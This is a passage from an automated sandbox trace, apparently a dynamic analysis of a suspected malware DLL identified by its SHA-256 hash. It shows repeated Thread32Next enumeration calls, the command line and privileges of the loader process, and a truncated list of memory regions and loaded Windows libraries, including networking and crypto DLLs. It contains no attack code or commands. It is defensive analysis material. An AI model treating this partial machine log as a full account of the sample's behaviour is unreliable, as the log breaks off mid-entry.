[0256.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0257.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 Thread: id = 208 os_tid = 0xe14 Process: id = "29" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x4ddfd000" os_pid = "0x60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8472 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8473 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8474 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8475 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 8476 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 8477 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 8478 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8479 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8480 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 8481 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 8482 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8483 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 8484 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8485 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8486 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8487 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 8488 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8489 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8490 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8491 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 8492 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8493 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8494 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 8496 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8497 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8498 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8499 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8500 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 8501 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8502 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8503 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8504 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8505 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8506 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8507 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8508 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8509 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8510 start_va = 0x6e0000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 8511 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8512 start_va = 0x870000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 8513 start_va = 0xa00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 8514 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 8515 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8516 start_va = 0x1e00000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 8517 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 8518 start_va = 0x1e00000 end_va = 0x1ebffff monitored = 0 entry_point = 0x1e20da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8519 start_va = 0x1fc0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 8521 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 8523 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 8524 start_va = 0x1fd0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 8525 start_va = 0x21d0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 8526 start_va = 0x25d0000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 8528 start_va = 0x2dd0000 end_va = 0x3d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 11393 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 11406 start_va = 0x3da0000 end_va = 0x40d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 11754 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 11755 start_va = 0x40e0000 end_va = 0x4373fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11889 start_va = 0x40e0000 end_va = 0x4224fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11890 start_va = 0x40e0000 end_va = 0x42a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11940 start_va = 0x40e0000 end_va = 0x5674fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11941 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 11945 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 11946 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 11947 start_va = 0x40e0000 end_va = 0x42b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11956 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 11957 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11958 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11960 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11965 start_va = 0x40e0000 end_va = 0x423dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 11969 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 11970 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11971 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11972 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 11973 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11974 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11975 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11976 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11977 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11978 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11979 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11980 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 11981 start_va = 0x1b0000 